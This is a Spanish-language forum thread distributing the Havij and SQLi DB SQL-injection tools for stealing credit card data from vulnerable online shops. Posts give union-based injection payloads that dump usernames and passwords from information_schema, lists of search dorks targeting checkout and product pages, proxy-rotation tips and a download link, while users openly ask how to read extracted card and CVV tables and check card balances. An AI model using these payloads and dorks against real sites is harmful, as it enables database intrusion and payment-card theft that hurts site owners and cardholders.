Novedades

Havij 1.15 + SQLi DB + Dorks


elchacal

Miembro
Registrado
14 Ago 2015
Mensajes
134
bueno disculpren mi inoracia
pero quisiera aprender de esto
havij
ese corre en windows
 

cLaK

Miembro
Registrado
7 Sep 2015
Mensajes
1
Muchas gracias por compartir, a probar y a ver que tal funciona :)
 

ezpyna11

Miembro
Registrado
12 Sep 2015
Mensajes
17
Un consejo para los que tienen el problema del error , no se si ya se dieron cuenta que tiene opcion para proxys? aaa pues esa opcion no solo es un bonito adorndo.....:/:cool: consigan algunas buenas SSL aqui mismo en el foro ahi varias, pongan y pongalos de uno en uno dentro de un block de notas, luego cuando les pase el error k mencionan solo cierran y abren nuevamente, cambian a otro proxy, y asi sucesivamente.....algunos consejos:
1.-Abusados por k cuando pasa ese error no guarda las paginas encontrados y si de pura casualidad habian encontrado unas 100 pero no las copiaron, las perderan.....
2.-Busquen la version Reborn del SQLi.DB.
3.-Ahi otros programas con la misma funcion es cuestion de buscar un poco, les dejo el nombre de 3 no se los pongo por que no los tengo a la mano.

*"SQLi_dumper"-- Bueno, ademas de buscar webs vulnerables pueden extraer su BD del mismo programa, y se olvidan de havij, sqlmap, etc....y se olvidan de havij,SQLmap,y etc....todo dependera que tanto lo estudien, bien explotado es una excelente herramienta.

*"Gr3NoX" mismo estilo que SQLi_dumper encuentra en masa una gran cantidad de sitiios con vulnerabilidades, ahora de aqui tu eliges que vul....buscara en esas pag.

*"Poizon" pues no ahi mucho que decir de este es lo mismo casi casi que usar SQLi_DB, (en lo personal son los k mejor me anduvieron).
Ahora que si usan linux y compañia ahi una infinidad de herammientas scri.... etc...mucho mas efectivas, aunque en lo personal les recomiendo que lo hagan de manera manual, se daran cuenta que en muchas ocasiones los programas fallan en paginas que manualmente no, si desiden tirarle por este lado les dejo algo que les puede servir:

-group_concat(table_name)" with "group_concat(username,0x3a,password)" and "from information_schema.columns where table_name=0x41646d696e-- with"
-group_concat(table_name)" and "from information_schema.tables where table_schema=database()--
-union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database()--
-group_concat(column_name)" and replace the "from information_schema.tables where table_schema=database()--" with "from information_schema.columns where table_name=0x41646d696e--
-group_concat(table_name)" with "group_concat(username,0x3a,password)" and "from information_schema.columns where table_name=0x41646d696e-- with "

Algunos Dorks:
checkout_confirmed.asp?order_id=
checkout_confirmed.cfm?order_id=
checkout_confirmed.php?order_id=
db/CART/product_details.asp?product_id=
db/CART/product_details.php?product_id=
eshop.php?id=
estore/products.php?cat=
garden_equipment/Fruit-Cage/product.asp?pr=
garden_equipment/Fruit-Cage/product.php?pr=
garden_equipment/pest-weed-control/product.asp?pr=
garden_equipment/pest-weed-control/product.php?pr=
getbook.asp?bookid=
getbook.cfm?bookid=
 

luispain

Miembro
Registrado
22 Sep 2015
Mensajes
10
perdonar por la novatada!! pero puedo como compruebo el dinero que tienen las Cc's?
 

pablillo69

Miembro
Registrado
11 Ago 2015
Mensajes
4
yo ya he hallado las tablas de cc cvv ccexpired pero me salen en blanco, no me muestra los datos, hay algo que se puede hacer?
 

dasapi83

Miembro
Registrado
27 Jun 2016
Mensajes
5
pues hay muchas paginas para saber cual es el banco de las ccs solo con el bin puedes saber ahora alguien tiene dork actualizados para poder injectar en sql de paginas mexicanas
 

abisay339

Miembro
Registrado
13 Feb 2020
Mensajes
1
Hola y muy buenas a todos los del foro, esta vez les traigo dos herramientas que les va a ser de mucha utilidad para que puedan sacar sus ccs ustedes mismos. Si solo vienes por el link, al final del post lo vas a ver.

En primer lugar hablare del Havij. Este programa lo usaremos cuando tengamos nuestras paginas vulnerables, lo que hará es analizarla, luego nos ira dejando poco a poco las columnas, tablas y la data, donde si tenemos suerte, habrán ccs.

Y por ultimo, el SQLi DB, que es un programa que nos ahorrara un montón de tiempo a la hora de buscar las paginas vulnerables, ya que lo que hace este programa es, tu le asignas una dork y se pone a buscar paginas vulnerables. Si te pone un check de color verde, tu pagina es vulnerable, felicidades. Si te pone una equis ''X'' roja, no te pongas mal, solo ve un poco mas abajo a ver si encuentras una vulnerable o si no, cambia de dork.
Aquí te dejo algunas dorks algo conocidas ya, pero que si tienes suerte, conseguirás lo que buscas:
inurl : productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=


Bueno, esto es todo espero lo hayan leido todo y si no coman mierda. No mentira hahah, solo otra cosa mas.. Denle like al post.

Aqui esta el link: https://www.sendspace.com/file/oe830i
 

Similar threads



Arriba